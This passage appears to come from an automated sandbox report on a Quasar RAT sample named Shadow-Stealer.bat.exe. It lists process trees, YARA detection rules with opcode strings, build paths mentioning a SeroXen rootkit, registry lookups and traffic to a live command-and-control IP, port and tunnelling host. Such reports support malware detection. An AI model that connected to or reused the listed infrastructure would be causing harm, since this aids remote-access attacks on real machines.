              • svchost.exe (PID: 980 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dllhost.exe (PID: 3268 cmdline: C:\Windows\System32\dllhost.exe /Processid:{6cf183fd-4345-4e83-86c3-b67edbc5a93f} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
              • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dllhost.exe (PID: 5112 cmdline: C:\Windows\System32\dllhost.exe /Processid:{a65f9779-a778-403b-96e3-bdb0de023251} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • dwm.exe (PID: 996 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
        • dllhost.exe (PID: 4176 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{e8c47de4-1fa8-45ae-ba48-1e652857c9f1} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • dllhost.exe (PID: 5564 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{38d5fde3-99ae-4373-8c2f-8b4f5f08f7f3} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • cscript.exe (PID: 6776 cmdline: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus MD5: CB601B41D4C8074BE8A84AED564A94DC)
          • WmiPrvSE.exe (PID: 3040 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
        • dllhost.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{25768c7a-7ac5-4718-a464-d7bd931650f7} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • dllhost.exe (PID: 3968 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{b21552e6-10c0-4b77-8348-e34fa993b74e} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • yApVCRtJPjQJu.exe (PID: 6932 cmdline: "C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • dllhost.exe (PID: 5132 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{408c66d6-6f69-434f-838a-86e87b4371ae} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • dllhost.exe (PID: 5076 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{205dcea9-d057-463c-a3cf-998f0b1939dc} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
  • cleanup
Name:Quasar RAT, QuasarRAT
Description:Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Attribution:
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
No configs have been found
Source: 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_CosturaAssemblyLoader
Description: Yara detected Costura Assembly Loader
Author: Joe Security

Source: 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_CosturaAssemblyLoader
Description: Yara detected Costura Assembly Loader
Author: Joe Security

Source: 0000000F.00000002.3570248897.000001FACD23D000.00000004.00000800.00020000.00000000.sdmp
Rule: Quasar_RAT_1
Description: Detects Quasar RAT
Author: Florian Roth
Strings:
  • 0x3a6528:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x3f6560:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x3a644c:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x3f6484:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x3a6e92:$op3: 00 04 03 69 91 1B 40
  • 0x3a76bb:$op3: 00 04 03 69 91 1B 40
  • 0x3f6eca:$op3: 00 04 03 69 91 1B 40
  • 0x3f76f3:$op3: 00 04 03 69 91 1B 40

Source: Process Memory Space: $sxr-powershell.exe PID: 6400
Rule: JoeSecurity_CosturaAssemblyLoader
Description: Yara detected Costura Assembly Loader
Author: Joe Security

Source: Process Memory Space: $sxr-powershell.exe PID: 6400
Rule: JoeSecurity_Quasar
Description: Yara detected Quasar RAT
Author: Joe Security

Source: 15.2.$sxr-powershell.exe.1facccc4e50.31.raw.unpack
Rule: JoeSecurity_CosturaAssemblyLoader
Description: Yara detected Costura Assembly Loader
Author: Joe Security

Source: 15.2.$sxr-powershell.exe.1facd584ef8.29.unpack
Rule: Quasar_RAT_1
Description: Detects Quasar RAT
Author: Florian Roth
Strings:
  • 0x5c830:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0xac868:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5c754:$op2: 00 17 03 1F 20 17 19 15 28
  • 0xac78c:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x5d19a:$op3: 00 04 03 69 91 1B 40
  • 0x5d9c3:$op3: 00 04 03 69 91 1B 40
  • 0xad1d2:$op3: 00 04 03 69 91 1B 40
  • 0xad9fb:$op3: 00 04 03 69 91 1B 40

Source: 15.2.$sxr-powershell.exe.1facd584ef8.29.raw.unpack
Rule: Quasar_RAT_1
Description: Detects Quasar RAT
Author: Florian Roth
Strings:
  • 0x5e630:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0xae668:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5e554:$op2: 00 17 03 1F 20 17 19 15 28
  • 0xae58c:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x5ef9a:$op3: 00 04 03 69 91 1B 40
  • 0x5f7c3:$op3: 00 04 03 69 91 1B 40
  • 0xaefd2:$op3: 00 04 03 69 91 1B 40
  • 0xaf7fb:$op3: 00 04 03 69 91 1B 40

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: Yara match; File source: Process Memory Space: $sxr-powershell.exe PID: 6400, type: MEMORYSTR
Source: eu-central-7075.packetriot.net; Virustotal: Detection: 15%

Compliance

Source: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe; Unpacked PE file: 42.2.yApVCRtJPjQJu.exe.2930000.6.unpack
Source: Binary string: <Module>costura.metadatacostura.sharpdx.direct3d11.pdb.compressedcostura.costura.pdb.compressedcostura.sharpdx.dxgi.pdb.compressedcostura.sharpdx.pdb.compressedcostura.sharpdx.direct3d11.dll.compressedcostura.costura.dll.compressedcostura.sharpdx.dxgi.dll.compressedcostura.gma.system.mousekeyhook.dll.compressedcostura.system.runtime.interopservices.runtimeinformation.dll.compressedcostura.quasar.common.dll.compressedcostura.newtonsoft.json.dll.compressedcostura.bouncycastle.crypto.dll.compressedcostura.ionic.zip.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.protobuf-net.dll.compressedcostura.sharpdx.dll.compressed4a731784-801d-481b-a36f-654a2936777eQuasar.Client.InstallStager.exeQuasar.Client.UninstallStager.exeQuasar.Client.ResetPatcher.binQuasar.Client.QuasarApplication.resourcesQuasar.Client.Properties.Resources.resourcesILRepack.List source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\C5\Documents\SeroXen Stuff\Quasar-master\Quasar-master-release\bin\Release\net452\REPOS\seroxen rootkit stuff\InstallStager\bin\Release\InstallStager.pdb source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.sharpdx.dxgi.pdb.compressed|||SharpDX.DXGI.pdb|D73E59804E3EE494A4612185771F7F67B2FD64AE|34752 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mshta.pdbGCTL source: $sxr-mshta.exe, 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe, 0000000A.00000000.2355999536.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe.3.dr
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yApVCRtJPjQJu.exe, 0000002A.00000002.3355364200.000000000083E000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: costura.costura.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.sharpdx.pdb.compressed|||SharpDX.pdb|1A7C10AA582CCEEBFFD9BC77A11353AAAE6417E9|42824 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: $sxr-cmd.exe, 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe, 0000000D.00000000.2370623512.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe.3.dr
Source: Binary string: #costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed|||SharpDX.Direct3D11.pdb|A2259A45EA284247B3AA65EC9C1DBEBD47FE208F|78220 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: Shadow-Stealer.bat.exe, 00000003.00000000.2146647550.00007FF6BFFCA000.00000002.00000001.01000000.00000003.sdmp, Shadow-Stealer.bat.exe.0.dr, $sxr-powershell.exe.3.dr
            Source: Binary string: powershell.pdb source: Shadow-Stealer.bat.exe, 00000003.00000000.2146647550.00007FF6BFFCA000.00000002.00000001.01000000.00000003.sdmp, Shadow-Stealer.bat.exe.0.dr, $sxr-powershell.exe.3.dr
            Source: Binary string: costura.sharpdx.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdb source: $sxr-cmd.exe, 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe, 0000000D.00000000.2370623512.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe.3.dr
            Source: Binary string: )costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mshta.pdb source: $sxr-mshta.exe, 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe, 0000000A.00000000.2355999536.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe.3.dr
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Note: CLSID {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} is CLSID_TaskScheduler, the Task Scheduler 2.0 COM class; these lookups are the COM activation path of the bundled microsoft.win32.taskscheduler.dll listed in the Costura resources above.
Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\$sxr-mshta.exe | Code function 10_2_000001ACEA2DBEDC: FindFirstFileExW
Source: C:\Windows\$sxr-cmd.exe | Code function 13_2_000002155A5BBEDC: FindFirstFileExW
Source: C:\Windows\$sxr-cmd.exe | Code function 13_2_00007FF7137F823C: FindFirstFileExW, GetLastError, GetProcessHeap, HeapAlloc, FindNextFileW, GetProcessHeap, HeapReAlloc, FindClose, GetLastError, FindClose
Source: C:\Windows\$sxr-cmd.exe | Code function 13_2_00007FF7137F2978: FindFirstFileW, FindClose, memmove, _wcsnicmp, _wcsicmp, memmove
Source: C:\Windows\$sxr-cmd.exe | Code function 13_2_00007FF713807B4C: FindFirstFileW, FindNextFileW, FindClose
Source: C:\Windows\$sxr-cmd.exe | Code function 13_2_00007FF7137E35B8: GetFileAttributesW, GetLastError, FindFirstFileW, GetLastError, FindClose, memset, ??_V@YAXPEAX@Z, FindNextFileW, SetLastError, ??_V@YAXPEAX@Z, GetLastError, FindClose
Source: C:\Windows\$sxr-cmd.exe | Code function 13_2_00007FF7137E1560: memset, FindFirstFileW, FindClose, FindFirstFileW, FindNextFileW, FindClose, ??_V@YAXPEAX@Z, GetLastError, SetFileAttributesW, _wcsnicmp, GetFullPathNameW, SetLastError, GetLastError, SetFileAttributesW
Source: C:\Windows\$sxr-powershell.exe | Code function 19_2_000001F5FDC7BEDC: FindFirstFileExW
Source: C:\Windows\System32\winlogon.exe | Code function 22_2_000002D0165EBEDC: FindFirstFileExW
Source: C:\Windows\System32\lsass.exe | Code function 24_2_000002D6F151BEDC: FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function 25_2_0000014E41FDBEDC: FindFirstFileExW
Source: C:\Windows\System32\dwm.exe | Code function 26_2_000001D15B49BEDC: FindFirstFileExW
Source: C:\Windows\SysWOW64\cscript.exe | Code function 28_2_009F9AE0: FindFirstFileExW
Source: C:\Windows\SysWOW64\cscript.exe | Code function 28_2_00A19AE0: FindFirstFileExW
Source: C:\Windows\SysWOW64\cscript.exe | Code function 28_2_00B19AE0: FindFirstFileExW
Source: C:\Windows\SysWOW64\cscript.exe | Code function 28_2_00B39AE0: FindFirstFileExW
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | IP Address: 167.71.56.116
Source: global traffic | TCP traffic: 192.168.2.6:49716 -> 167.71.56.116:22112
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486093727.000002D6F0E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: lsass.exe, 00000018.00000000.2485971578.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366282743.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3364189171.000002D6F0C45000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485797316.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3367690216.000002D6F0E11000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3365446317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486093727.000002D6F0E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485919317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
            Source: cscript.exe, 0000001C.00000002.3371306184.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001C.00000000.2515366668.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3367690216.000002D6F0E11000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3365446317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486093727.000002D6F0E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485919317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lsass.exe, 00000018.00000000.2485971578.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366282743.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3364189171.000002D6F0C45000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485797316.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: lsass.exe, 00000018.00000000.2485971578.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366282743.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3364189171.000002D6F0C45000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485797316.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
